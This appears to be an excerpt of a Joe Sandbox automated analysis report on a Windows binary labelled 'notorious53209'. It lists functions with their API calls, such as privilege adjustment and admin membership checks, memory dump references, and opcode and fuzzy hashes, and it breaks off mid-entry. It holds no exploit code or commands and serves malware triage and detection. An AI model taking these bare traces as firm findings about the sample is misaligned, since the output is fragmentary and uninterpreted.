                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                  • String ID:
                                                  • API String ID: 1157408455-0
                                                  • Opcode ID: 4cb568ede2837ed9a5297393f7fd52d50143e8af35230485a965dee9cec3585d
                                                  • Instruction ID: 7d9303ee35fdef8691bfec05cc0e813129b833a8360a7d0037b2ea4aa36b2357
                                                  • Opcode Fuzzy Hash: 4cb568ede2837ed9a5297393f7fd52d50143e8af35230485a965dee9cec3585d
                                                  • Instruction Fuzzy Hash: A911A7759012287AE7309BA5AC4DFABBB7CEF45760F1041AAF908E7180D6744F808BA4
                                                  Function 00881290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008812D8
                                                  • GetClientRect.USER32(?,?), ref: 008BB84B
                                                  • GetCursorPos.USER32(?), ref: 008BB855
                                                  • ScreenToClient.USER32(?,?), ref: 008BB860
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                  • String ID:
                                                  • API String ID: 1010295502-0
                                                  • Opcode ID: b44f492d78b12e026aa702663f0cc583e2bfb80f5c1817bf3c2e4e0804f4f780
                                                  • Instruction ID: 74f2553dfe9ba175e10729a9eeb7580b7670195449bfdfce3b5487e6c66db251
                                                  • Opcode Fuzzy Hash: b44f492d78b12e026aa702663f0cc583e2bfb80f5c1817bf3c2e4e0804f4f780
                                                  • Instruction Fuzzy Hash: 54112535A1011DAFCF10EFA8D8899FE77B8FB05310F000466F901E7251DB30BA929BA6
                                                  Function 008DEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008DEB19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  • Opcode ID: 6b267f976c492e2fd667664067ae32ce31c1b681e0674100b245726b263d2893
                                                  • Instruction ID: 46a1e3cd3c24c9d014092d7acd8b55ca50340f64fbf261781298f415aa3f28c4
                                                  • Opcode Fuzzy Hash: 6b267f976c492e2fd667664067ae32ce31c1b681e0674100b245726b263d2893
                                                  • Instruction Fuzzy Hash: DC323675A007059FD728DF19C481A6AB7F1FF48320B15C56EE89ADB7A2EB70E941CB40
                                                  Function 008EB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 008EB5AE
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008EB608
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008EB655
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  • Opcode ID: d16b45d247368bffecbadf4e19d3a2acabc9712b41e322de470803d9f1cf6784
                                                  • Instruction ID: ba4849fac02fc80a57baa4ab40d80927cde59a60f092e90a0abdc685a78c85e1
                                                  • Opcode Fuzzy Hash: d16b45d247368bffecbadf4e19d3a2acabc9712b41e322de470803d9f1cf6784
                                                  • Instruction Fuzzy Hash: 88216235A10518EFCB00EF99D880EADBBB8FF49310F1480A9E945EB351DB319915CB51
                                                  Function 008D8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                                    • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                                  • GetLastError.KERNEL32 ref: 008D8D47
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: 9f6c62526335dd46668fa2d0b0d7afa6a47b8354bdbd9111ac61edd7153884ca
                                                  • Instruction ID: 4dea8d3bc023855cf9233ee4e7f638eeb88d9161ff8f89d8681e5a67011aee1d
                                                  • Opcode Fuzzy Hash: 9f6c62526335dd46668fa2d0b0d7afa6a47b8354bdbd9111ac61edd7153884ca
                                                  • Instruction Fuzzy Hash: 7F116AB1414209AFE728AF68DC85D6BB7BDFB44710B20862EF456D3681EF70B9408A60
                                                  Function 008E4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008E4C2C
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E4C43
                                                  • FreeSid.ADVAPI32(?), ref: 008E4C53
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                                                  • Instruction ID: 655602456e46edac43fae564d061945e5cb132b1a8263de23b9e76bd955d4cf3
                                                  • Opcode Fuzzy Hash: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                                                  • Instruction Fuzzy Hash: 98F04975A1130CBFDF04DFF0DC99AAEBBBCEF08701F1044A9A901E2581E6746B049B50
                                                  Function 0088E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 408e1034c25343bc632828ecf85df66e59921ee5303864e709529ebc364a611b
                                                  • Instruction ID: 90fa86edfb64120adfe70a14aba70167cf823af34b6afa6ce5708078adb9a76f
                                                  • Opcode Fuzzy Hash: 408e1034c25343bc632828ecf85df66e59921ee5303864e709529ebc364a611b
                                                  • Instruction Fuzzy Hash: C922AD74A0021ADFDB24EF58C484AAEB7F0FF09314F148469E856EB351E774AD81CB91
                                                  Function 008816DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • GetParent.USER32(?), ref: 008BBA0A
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,008819B3,?,?,?,00000006,?), ref: 008BBA84
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                  • String ID:
                                                  • API String ID: 314495775-0
                                                  • Opcode ID: fbd22e77bda6697654fe498970e2d0425958b09d2e7d6382e9782cf733383d5b
                                                  • Instruction ID: 9b23bcd7a2cb6284b70afdaebf6fabc785c9ffd3f9bbd28f090edad56714feec
                                                  • Opcode Fuzzy Hash: fbd22e77bda6697654fe498970e2d0425958b09d2e7d6382e9782cf733383d5b
                                                  • Instruction Fuzzy Hash: 2621A234605218AFCF20AB28C888DA93BDAFF4A324F544264F515DB3F6CB719D129B51
                                                  Function 008EC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 008EC966
                                                  • FindClose.KERNEL32(00000000), ref: 008EC996
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 1547b2f9340917107d4bd9e5a8b3b34101afc7cc32b0940641dbd27417b5ed43
                                                  • Instruction ID: eba21e8c39207c31a94af71368b2e093c1316a3a561ed9a0c0564d606ce86f34
                                                  • Opcode Fuzzy Hash: 1547b2f9340917107d4bd9e5a8b3b34101afc7cc32b0940641dbd27417b5ed43
                                                  • Instruction Fuzzy Hash: E21161726146149FD710EF29D845A2AFBE9FF85324F04851EF9AAD7291DB30AD01CB81
                                                  Function 0090C86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,008BBB8A,?,?,?), ref: 0090C8E1
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0090C8C7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                  • String ID:
                                                  • API String ID: 1273190321-0
                                                  • Opcode ID: c3497a3b9f3a55611c7c4b00651f6e8ba236333554dc3a1b1fc2729febc023be
                                                  • Instruction ID: 2dfba8face8f3665d69f89d6c8a05d3b53fd2dcc6817a62edbb728eeb942c76c
                                                  • Opcode Fuzzy Hash: c3497a3b9f3a55611c7c4b00651f6e8ba236333554dc3a1b1fc2729febc023be
                                                  • Instruction Fuzzy Hash: 4601FC71204214EFCB21AF14CC54F663BA7FF86324F144624FD514B2E1C7315802EB91
                                                  Function 0090CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 0090CC51
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,008BBC66,?,?,?,?,?), ref: 0090CC7A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClientDialogNtdllProc_Screen
                                                  • String ID:
                                                  • API String ID: 3420055661-0
                                                  • Opcode ID: f59375b1cc9e902b07d7ff005bde5f113691b2543be1959f04421b6ca8440f01
                                                  • Instruction ID: b00ae03b5b992b1f20ca40b37d05e9ea8164bbcda6f747a2c1c159bee2140fe7
                                                  • Opcode Fuzzy Hash: f59375b1cc9e902b07d7ff005bde5f113691b2543be1959f04421b6ca8440f01
                                                  • Instruction Fuzzy Hash: A7F01772410218FFEB148F85DC099AE7BB9EB48711F00416AF945A2161D3716A60EBA0
                                                  Function 008EA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008F977D,?,0090FB84,?), ref: 008EA302
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008F977D,?,0090FB84,?), ref: 008EA314
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: 9eedebc25ad8a20a7a6018c5588ca44ce4bc17f195dd6440422146e508447ff1
                                                  • Instruction ID: 58dad320df8c992829107783b7b1fae109452f4aa695f4e3557c68832f7abefb
                                                  • Opcode Fuzzy Hash: 9eedebc25ad8a20a7a6018c5588ca44ce4bc17f195dd6440422146e508447ff1
                                                  • Instruction Fuzzy Hash: A9F0893555521DABDB209FA4CC88FEA776DFF09761F004155B918D6241D630A940CBA1
                                                  Function 0090CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0090CD74
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,008BBBE5,?,?,?,?), ref: 0090CDA2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogLongNtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 2065330234-0
                                                  • Opcode ID: 53746f7db9c26f8c902d828b401b33ea0158bbb737a68edc093437a829ed3385
                                                  • Instruction ID: ca0d02990bec06382ab4c575f02ef4ae1eefd1371263d0a56907e89430a4a2b3
                                                  • Opcode Fuzzy Hash: 53746f7db9c26f8c902d828b401b33ea0158bbb737a68edc093437a829ed3385
                                                  • Instruction Fuzzy Hash: C7E08671104258BFEB249F19DC19FBA3B58EB04750F408625F956E90E1C771D950E760
                                                  Function 008D8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8851), ref: 008D8728
                                                  • CloseHandle.KERNEL32(?), ref: 008D873A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 067e9adc32b5f72e21c22d5cce1badcdd82d4a0ea61af238d7cf19f775ba0444
                                                  • Instruction ID: 57e5a85d86065507219fe6d0608132bf973328a944147874bce2b3c10ef337e8
                                                  • Opcode Fuzzy Hash: 067e9adc32b5f72e21c22d5cce1badcdd82d4a0ea61af238d7cf19f775ba0444
                                                  • Instruction Fuzzy Hash: F1E0BF75014610EEEB352B64EC09D7777A9FB04790B158529F466C0870DB615C90EB10
                                                  Function 008AA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008AA39A
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 008AA3A3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
